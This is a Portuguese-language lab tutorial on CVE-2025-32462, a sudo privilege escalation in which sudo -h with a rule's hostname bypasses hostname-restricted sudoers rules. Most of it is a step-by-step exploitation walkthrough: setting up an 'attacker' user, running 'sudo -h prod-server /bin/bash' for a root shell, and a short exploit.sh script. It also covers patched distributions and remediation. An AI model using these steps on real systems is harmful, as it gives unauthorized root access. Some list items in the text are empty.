
CVE-2025-32462 é uma vulnerabilidade de escalonamento local de privilégios no sudo
CVE-2025-32462 é uma vulnerabilidade de escalação local de privilégios no sudo que permite a um usuário com baixos privilégios executar comandos como root ao abusar de regras do sudo restritas por hostname. O problema reside em como o sudo historicamente lidava com a opção -h (host) durante as verificações de autorização.
Quando uma regra do sudoers é restrita a um hostname específico, o sudo só deve permitir a execução quando o hostname do sistema corresponder à regra. Devido a uma lógica falha, as versões afetadas confiavam em um hostname fornecido pelo usuário via sudo -h, permitindo que invasores contornassem completamente a restrição.
O sudo permitia que o argumento -h <hostname> influenciasse as decisões de autorização. Nas versões vulneráveis, o hostname fornecido era confiado durante a avaliação da regra do sudoers, em vez de ser validado estritamente contra o hostname real do sistema.
Como resultado, as restrições do sudo baseadas em hostname podiam ser contornadas.
Se explorada com sucesso, um atacante local pode:
Em ambientes reais, esta vulnerabilidade é particularmente perigosa em:
| Componente | Detalhes |
|---|---|
| SO | Debian 11 (Bullseye – sem correção) |
| Versão do sudo | ≤ 1.9.13 |
| Nível de Acesso | Usuário local |
| Virtualização | VirtualBox |
⚠️ Nota: Lançamentos modernos do Ubuntu e Debian incluíram correções retroativas enquanto mantêm strings de versão semelhantes. Esta vulnerabilidade não pode ser reproduzida em sistemas corrigidos.
sudo --version
Esperado (vulnerável):
Sudo version 1.9.5p2
sudo useradd -m attacker
sudo passwd attacker
groups attacker
Esperado:
attacker : attacker
O usuário não deve pertencer ao grupo sudo.
Edite o sudoers com segurança:
sudo visudo
Adicione a seguinte linha:
attacker prod-server = (root) ALL
prod-server é um hostname falsoVerifique:
sudo -l -U attacker
Esperado:
User attacker may run the following commands on prod-server:
(root) ALL
Troque de usuário:
su - attacker
Tente o sudo normalmente:
sudo id
Esperado:
attacker is not allowed to run sudo on <hostname>
Acione a vulnerabilidade:
sudo -h prod-server id
Saída de exploração bem-sucedida:
uid=0(root) gid=0(root) groups=0(root)
Abra um shell root:
sudo -h prod-server /bin/bash
Verifique:
id
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id
Salve como exploit.sh, torne executável e execute como usuário attacker:
chmod +x exploit.sh
./exploit.sh
| Ação | Resultado |
|---|---|
| sudo Normal | ❌ Negado |
sudo -h prod-server id | ✅ Root |
Isso confirma uma escalação de privilégios bem-sucedida.
Lançamentos modernos do Ubuntu parecem incluir versões do sudo que se enquadram na faixa afetada. No entanto, o Ubuntu incluiu a correção de segurança para o CVE‑2025‑32462 de forma retroativa, sem alterar a string de versão original.
Como resultado:
sudo -h não influencia mais as verificações de autorizaçãoIsso destaca a importância de validar o status da vulnerabilidade usando testes comportamentais, não apenas strings de versão.
sudo para uma versão corrigidaEste tutorial é apenas para fins educacionais e de pesquisa em segurança defensiva. Não teste esta vulnerabilidade em sistemas que você não possui ou para os quais não tem permissão explícita para avaliar.